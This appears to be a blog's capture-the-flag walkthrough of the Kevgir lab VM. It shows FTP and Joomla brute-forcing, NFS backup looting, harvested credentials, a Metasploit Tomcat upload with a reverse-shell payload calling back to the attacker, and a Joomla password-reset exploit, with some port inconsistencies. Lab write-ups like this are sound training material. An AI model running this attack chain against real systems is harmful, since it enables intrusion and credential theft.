Mr_H4sh

Infosec, CTF and more

Kevgir Solution

In this post I’m going to show you how to solve the Kevgir VM provided by the team of canyoupwn.me.

You can find the VM on this link.

192.168.56.102 <== attacker
192.168.56.101 <== victim

I run a nmap scan on the victim host, and this is what I find:

nmap -sT -p- -Pn -n -v 192.168.56.101 -T5

Nmap scan report for 192.168.56.101
Host is up (0.00037s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1322/tcp  open  novation
2049/tcp  open  nfs
6379/tcp  open  unknown
8080/tcp  open  http-proxy
8081/tcp  open  blackice-icecap
9000/tcp  open  cslistener
35064/tcp open  unknown
40223/tcp open  unknown
42904/tcp open  unknown
46240/tcp open  unknown
52717/tcp open  unknown
57163/tcp open  unknown
58194/tcp open  unknown

I see that the port 23 is open, so I log in and I see that the service that is running is vsftpd. I make a couple of tests, and I see that the system asks for a password when a valid username has been typed. This is good for user enumeration, and I find a user and a password:

# medusa -h 192.168.56.102 -n 25 -u admin -P /usr/share/wordlists/rockyou.txt -M ftp
root@Karen:~/Desktop/workspace/pentest/kevgir# medusa -h 192.168.56.102 -n 25 -u admin -P /usr/share/wordlists/rockyou.txt -M ftp
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

[...]
ACCOUNT CHECK: [ftp] Host: 192.168.56.101 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (19819 of 14344391 complete)
ACCOUNT FOUND: [ftp] Host: 192.168.56.101 User: admin Password: admin [SUCCESS]

Cool, I have now a login access as admin with password admin.

# ftp 192.168.56.101 25
Connected to 192.168.56.101.
220 (vsFTPd 3.0.2)
Name (192.168.56.101:root): admin
331 Please specify the password.
Password: admin
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

I see that the port 2049 (nfs) is open, so I see which mounts are available:

# showmount -e 192.168.56.101

Export list for 192.168.56.101:
/backup *

# mkdir /media/backup
# mount 192.168.56.101:/backup /media/backup

# ls -l
total 12752
-rw-r--r-- 1 root root 13058028 Feb 15 02:35 backup.tar.bz2.zip

# unzip backup.tar.bz2.zip 
unzip backup.tar.bz2.zip 
Archive:  backup.tar.bz2.zip
[backup.tar.bz2.zip] backup.tar.bz2 password: 

So, in here there’s a password to be discovered. I use fcrackzip to discover the password using bruteforce mode:

# fcrackzip -b -u -v backup.tar.bz2.zip
found file 'backup.tar.bz2', (size cp/uc 13057834/13076586, flags 9, chk 28e3)


PASSWORD FOUND!!!!: pw == aaaaaa
# unzip backup.tar.bz2.zip 
Archive:  backup.tar.bz2.zip
[backup.tar.bz2.zip] backup.tar.bz2 password: aaaaaa
  inflating: backup.tar.bz2          

# ls
backup.tar.bz2 backup.tar.bz2.zip

# bunzip2 backup.tar.bz2
# ls
backup.tar backup.tar.bz2

# tar -xvf backup.tar

The content of the file is a folder called html, and it contains the source code of various web applications fuuuull of tasty information, such as passwords, which database is used, secret keys and so on. So far I’ve found:

Users:
root
admin
nobody
joomlauser

Passwords: 
p@ssw0rd
password
toor
1m4dm1n!
baz

Secret Keys:
phn4U0DCRrlLzM5M

I go ahead and visit the URL http://192.168.56.101:80, and I find a web page. I run nikto to see if there’s any nice information that I can fetch, and I find a folder called /phpmyadmin/. I go to the URL http://192.168.56.101:80/phpmyadmin/ and I find the login page of PHP MyAdmin. With the information that I gathered, I try to attempt some login, and it is successful with the credentials root:toor, so even with this I’m in.

I go ahead and check the port 8080, and I find out that a version of Apache Tomcat 7 is running on the server. I see from the page that there’s the link to the admin page, which is http://192.168.56.101:8080/manager/html. On the page appears a request to submit a login, so I open metasploit and try to enumerate the users to check if the login has some default user:password.

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                                                 Required  Description
   ----              ---------------                                                                 --------  -----------
   BLANK_PASSWORDS   false                                                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                           no        Add all users in the current database to the list
   PASSWORD                                                                                          no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                            yes       The target address range or CIDR identifier
   RPORT             8080                                                                            yes       The target port
   SSL               false                                                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                                                               yes       The number of concurrent threads
   USERNAME                                                                                          no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                            yes       Whether to print output for all attempts
   VHOST                                                                                             no        HTTP server virtual host

msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(tomcat_mgr_login) > exploit

[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: admin:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: manager:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: role1:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: tomcat:root (Incorrect: )
[+] 192.168.56.101:8080 - LOGIN SUCCESSFUL: tomcat:tomcat
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:admin (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:manager (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:role1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:root (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:tomcat (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: both:s3cret (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: j2deployer:j2deployer (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: cxsdk:kdsxc (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: root:owaspbwa (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: ADMIN:ADMIN (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: xampp:xampp (Incorrect: )
[-] 192.168.56.101:8080 TOMCAT_MGR - LOGIN FAILED: QCC:QLogic66 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Metasploit has successfully found the default login tomcat:tomcat. I double check and it works.

I try to open a shell to access the system using Metasploit:

msf exploit(tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf exploit(tomcat_mgr_upload) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_upload) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(tomcat_mgr_upload) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_upload) > show payloads

Compatible Payloads
===================

   Name                            Disclosure Date  Rank    Description
   ----                            ---------------  ----    -----------
   generic/custom                                   normal  Custom Payload
   generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                        normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http                    normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https                   normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp                     normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp                              normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp                           normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp                           normal  Java Command Shell, Reverse TCP Inline

msf exploit(tomcat_mgr_upload) > set PAYLOAD  java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   tomcat           no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.56.101   yes       The target address
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   USERNAME   tomcat           no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java Universal


msf exploit(tomcat_mgr_upload) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf exploit(tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080

msf exploit(tomcat_mgr_upload) > exploit

[*] Started reverse TCP handler on 192.168.56.102:4444 
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying KouAIza32aSW4YGjeDWv...
[*] Executing KouAIza32aSW4YGjeDWv...
[*] Undeploying KouAIza32aSW4YGjeDWv ...
[*] Sending stage (2952 bytes) to 192.168.56.102
[*] Command shell session 1 opened (192.168.56.102:4444 -> 192.168.56.101:53214) at 2016-03-26 17:24:20 +0000

ls
common
conf
logs
server
shared
webapps
work

id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)

I go ahead and check the port number 6379. I connect with netcat and try to fuzz some commands, and I see that the systems answers with a particular string:

# nc 192.168.56.101 6379
a
-ERR unknown command 'a'
help
-ERR unknown command 'help'
helo
-ERR unknown command 'helo'
GET
-ERR wrong number of arguments for 'get' command
GET a
$-1

I find out that the system running on this port is Redis, so I use metasploit again to check if I can fetch some information.

msf > search redis

Matching Modules
================

   Name                                                      Disclosure Date  Rank       Description
   ----                                                      ---------------  ----       -----------
   auxiliary/scanner/misc/redis_server                                        normal     Redis-server Scanner
   auxiliary/scanner/redis/file_upload                       2015-11-11       normal     Redis File Upload
   auxiliary/scanner/redis/redis_server                                       normal     Redis Scanner
   exploit/windows/browser/ie_createobject                   2006-04-11       excellent  MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution
   exploit/windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
   exploit/windows/browser/webex_ucf_newobject               2008-08-06       good       WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
   exploit/windows/email/ms07_017_ani_loadimage_chunksize    2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)


msf > use auxiliary/scanner/redis/redis_server
msf auxiliary(redis_server) > show options

Module options (auxiliary/scanner/redis/redis_server):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   COMMAND   INFO             yes       The Redis command to run
   Password  foobared         no        Redis password for authentication test
   RHOSTS                     yes       The target address range or CIDR identifier
   RPORT     6379             yes       The target port
   THREADS   1                yes       The number of concurrent threads

msf auxiliary(redis_server) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(redis_server) > exploit

[+] 192.168.56.101:6379   - Found redis with INFO command: $1904\x0d\x0a# Server\x0d\x0aredis_version:3.0.7\x0d\x0aredis_git_sha1:00000000\x0d\x0aredis_git_dirty:0\x0d\x0aredis_build_id:aa70bcb321ba8313\x0d\x0aredis_mode:standalone\x0d\x0aos:Linux 3.19.0-25-generic i686\x0d\x0aarch_bits:32\x0d\x0amultiplexing_api:epoll\x0d\x0agcc_version:4.8.4\x0d\x0aprocess_id:1196\x0d\x0arun_id:61ec56a645b040c43367f92971e0d6df69f65c04\x0d\x0atcp_port:6379\x0d\x0auptime_in_seconds:1101\x0d\x0auptime_in_days:0\x0d\x0ahz:10\x0d\x0alru_clock:14967331\x0d\x0aconfig_file:/etc/redis/6379.conf\x0d\x0a\x0d\x0a# Clients\x0d\x0aconnected_clients:1\x0d\x0aclient_longest_output_list:0\x0d\x0aclient_biggest_input_buf:0\x0d\x0ablocked_clients:0\x0d\x0a\x0d\x0a# Memory\x0d\x0aused_memory:637624\x0d\x0aused_memory_human:622.68K\x0d\x0aused_memory_rss:8929280\x0d\x0aused_memory_peak:637624\x0d\x0aused_memory_peak_human:622.68K\x0d\x0aused_memory_lua:24576\x0d\x0amem_fragmentation_ratio:14.00\x0d\x0amem_allocator:jemalloc-3.6.0\x0d\x0a\x0d\x0a# Persistence\x0d\x0aloading:0\x0d\x0ardb_changes_since_last_save:0\x0d\x0ardb_bgsave_in_progress:0\x0d\x0ardb_last_save_time:1457806806\x0d\x0ardb_last_bgsave_status:ok\x0d\x0ardb_last_bgsave_time_sec:-1\x0d\x0ardb_current_bgsave_time_sec:-1\x0d\x0aaof_enabled:0\x0d\x0aaof_rewrite_in_progress:0\x0d\x0aaof_rewrite_scheduled:0\x0d\x0aaof_last_rewrite_time_sec:-1\x0d\x0aaof_current_rewrite_time_sec:-1\x0d\x0aaof_last_bgrewrite_status:ok\x0d\x0aaof_last_write_status:ok\x0d\x0a\x0d\x0a# Stats\x0d\x0atotal_connections_received:1\x0d\x0atotal_commands_processed:0\x0d\x0ainstantaneous_ops_per_sec:0\x0d\x0atotal_net_input_bytes:14\x0d\x0atotal_net_output_bytes:0\x0d\x0ainstantaneous_input_kbps:0.00\x0d\x0ainstantaneous_output_kbps:0.00\x0d\x0arejected_connections:0\x0d\x0async_full:0\x0d\x0async_partial_ok:0\x0d\x0async_partial_err:0\x0d\x0aexpired_keys:0\x0d\x0aevicted_keys:0\x0d\x0akeyspace_hits:0\x0d\x0akeyspace_misses:0\x0d\x0apubsub_channels:0\x0d\x0apubsub_patterns:0\x0d\x0alatest_fork_usec:0\x0d\x0amigrate_cached_sockets:0\x0d\x0a\x0d\x0a# Replication\x0d\x0arole:master\x0d\x0aconnected_slaves:0\x0d\x0amaster_repl_offset:0\x0d\x0arepl_backlog_active:0\x0d\x0arepl_backlog_size:1048576\x0d\x0arepl_backlog_first_byte_offset:0\x0d\x0arepl_backlog_histlen:0\x0d\x0a\x0d\x0a# CPU\x0d\x0aused_cpu_sys:13.12\x0d\x0aused_cpu_user:0.30\x0d\x0aused_cpu_sys_children:0.00\x0d\x0aused_cpu_user_children:0.00\x0d\x0a\x0d\x0a# Cluster\x0d\x0acluster_enabled:0\x0d\x0a\x0d\x0a# Keyspace
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I can say that I get loads of information about the system. At this point I have to find a way to upload a shell on the system.

I go ahead and check the port 8081. There’s a website with joomla. I try to fetch some information using netcat:

# nc 192.168.56.101 8081
HEAD / HTTP/1.1
Host: 192.168.56.101

HTTP/1.1 200 OK
Date: Sat, 12 Mar 2016 18:37:13 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Set-Cookie: 2837a59c63a65a4dec38297efe446470=ntdjn4961gjcj80rpbvbkfkbu5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 12 Mar 2016 18:37:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8

I check the source code and I find out that the version of Joomla running is the 1.5. Just to be sure, I use metasploit to double check:

msf > use auxiliary/scanner/http/joomla_version
msf auxiliary(joomla_version) > show options

Module options (auxiliary/scanner/http/joomla_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the Joomla application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_version) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(joomla_version) > set RPORT 8081
RPORT => 8081
msf auxiliary(joomla_version) > exploit

[*] Server: Apache/2.4.7 (Ubuntu)
[*] Joomla version: 1.5.0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And yes, the version is 1.5.0.

I check the URL http://192.168.56.101:8081/robots.txt and I find that it exists, and the disabled folders are:

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/
Disallow: /xmlrpc/

I also check for the URL http://192.168.56.101:8081/administrator/login.php and I find the administration login page.

I run nikto to check for some more information:

# nikto -h http://192.168.56.101:8081/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.101
+ Target Hostname:    192.168.56.101
+ Target Port:        8081
+ Start Time:         2016-03-12 19:12:28 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie 2837a59c63a65a4dec38297efe446470 created without the httponly flag
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x130 0x445ac694a2180 
+ Cookie 7c97a0247c3e642ace7069114ad93f42 created without the httponly flag
+ Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/images/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/media/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/templates/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Cookie 73317aa332813d7bac99f6815015cb66 created without the httponly flag
+ Entry '/xmlrpc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 14 entries which should be manually viewed.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1:8081/images/".
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-39272: favicon.ico file identifies this server as: Joomla
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /logs/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 0
+ OSVDB-3092: /test.txt: This might be interesting...
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8514 requests: 0 error(s) and 36 item(s) reported on remote host
+ End Time:           2016-03-12 19:12:57 (GMT0) (29 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

There’s another phpmyadmin directory, which I access and try to use the credentials root:toor and it works. I want to bruteforce the administrator login page, so I prepare a text file with the usernames and passwords that I’ve gathered and use metasploit:

# cat users.txt
root
nobody
joomlauser

# cat passwords.txt 
p@ssw0rd
password
toor
1m4dm1n

And I setup metasploit with the joomla bruteforce auxiliary:

msf auxiliary(joomla_version) > use auxiliary/scanner/http/joomla_bruteforce_login
msf auxiliary(joomla_bruteforce_login) > show options
msf auxiliary(joomla_bruteforce_login) > show options

Module options (auxiliary/scanner/http/joomla_bruteforce_login):

   Name              Current Setting                                                           Required  Description
   ----              ---------------                                                           --------  -----------
   AUTH_URI          /administrator/index.php                                                  yes       The URI to authenticate against
   BLANK_PASSWORDS   false                                                                     no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                         yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                     no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                     no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                     no        Add all users in the current database to the list
   FORM_URI          /administrator                                                            yes       The FORM URI to authenticate against
   PASSWORD                                                                                    no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt      no        File containing passwords, one per line
   PASS_VARIABLE     passwd                                                                    yes       The name of the variable for the password field
   Proxies                                                                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                                                      yes       The target address range or CIDR identifier
   RPORT             80                                                                        yes       The target port
   SSL               false                                                                     no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                     yes       Stop guessing when a credential works for a host
   THREADS           1                                                                         yes       The number of concurrent threads
   USERNAME                                                                                    no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                     no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/http_default_users.txt     no        File containing users, one per line
   USER_VARIABLE     username                                                                  yes       The name of the variable for the user field
   VERBOSE           true                                                                      yes       Whether to print output for all attempts
   VHOST                                                                                       no        HTTP server virtual host
   WORD_ERROR        mod-login-username                                                        yes       The word of message for detect that login fail

msf auxiliary(joomla_bruteforce_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(joomla_bruteforce_login) > set RPORT 8081
RPORT => 8081

msf auxiliary(joomla_bruteforce_login) > set PASS_FILE /root/Desktop/workspace/pentest/kevgir/passwords.txt
PASS_FILE => /root/Desktop/workspace/pentest/kevgir/passwords.txt
msf auxiliary(joomla_bruteforce_login) > set USER_FILE /root/Desktop/workspace/pentest/kevgir/users.txt
USER_FILE => /root/Desktop/workspace/pentest/kevgir/users.txt
msf auxiliary(joomla_bruteforce_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(joomla_bruteforce_login) > set WORK_ERROR login-error-message
WORK_ERROR => login-error-message
msf auxiliary(joomla_bruteforce_login) > exploit

Unfortunalely I can’t find the any user/password combination, so I go ahead and I notice from the backup folder that the joomla website is a copy of the gentleman folder. I keep notes for later. I do a scan with OWASP’s joomscan to see if I can find any other vulnerability, since I can’t crack the password.

joomscan -u http://192.168.56.101:8081


 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|.  
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   || 
||      ||   ||  ||  |     |  ||     ''|||.   ||...|' 
'|.     ||    ||| |||     .''''|.  .     '||  ||      
 ''|...|'      |   |     .|.  .||. |'....|'  .||.     
    
 
=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4  
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================


Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan 


Target: http://192.168.56.101:8081

Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK 


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

Use of uninitialized value in pattern match (m//) at ./joomscan.pl line 1009.
~Generic version family ....... [1.5.x]

~1.5.x htaccess.txt revealed [1.5.1 - 1.5.3]
~1.5.x configuration.php-dist revealed [1.5.1 - 1.5.8]
~1.5.x en-GB.xml revealed [1.5.0 - 1.5.1]
~1.5.x en-GB.ini revealed 1.5.1
~1.5.x admin en-GB.com_config.ini revealed [1.5.0(stable) -1.5.1]
~1.5.x admin en-GB.ini revealed 1.5.1
~1.5.x adminlists.html revealed [1.5.0(stable) - 1.5.6]

* The Exact version found is 1.5.1

## Fingerprinting done.




Vulnerabilities Discovered
==========================

[...]

# 15
Info -> CoreComponent: Joomla Remote Admin Password Change Vulnerability 
Versions Affected: 1.5.5 <= 
Check: /components/com_user/controller.php
Exploit: 1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm  2. Write into field "token" char ' and Click OK.  3. Write new password for admin  4. Go to url : target.com/administrator/  5. Login admin with new password 
Vulnerable? Yes

[...]
There are 19 vulnerable points in 34 found entries!

So, with this scanner I can see that I can use this exploit to change the admin’s password. Since I want to persist the authentication, I don’t want to make any noise changing the admin’s password, so I skip this passage. From the phpmyadmin’s page, I access the database joomla and this is what I find regarding the admin user:

Name:Administrator  
Username:admin
Email: admin@joomla.org
Password: 282f4f379de5c0203e101995e95f3e80:Ce79tnJDKJvbEv6hcv7blLCoFPM3T7dg   

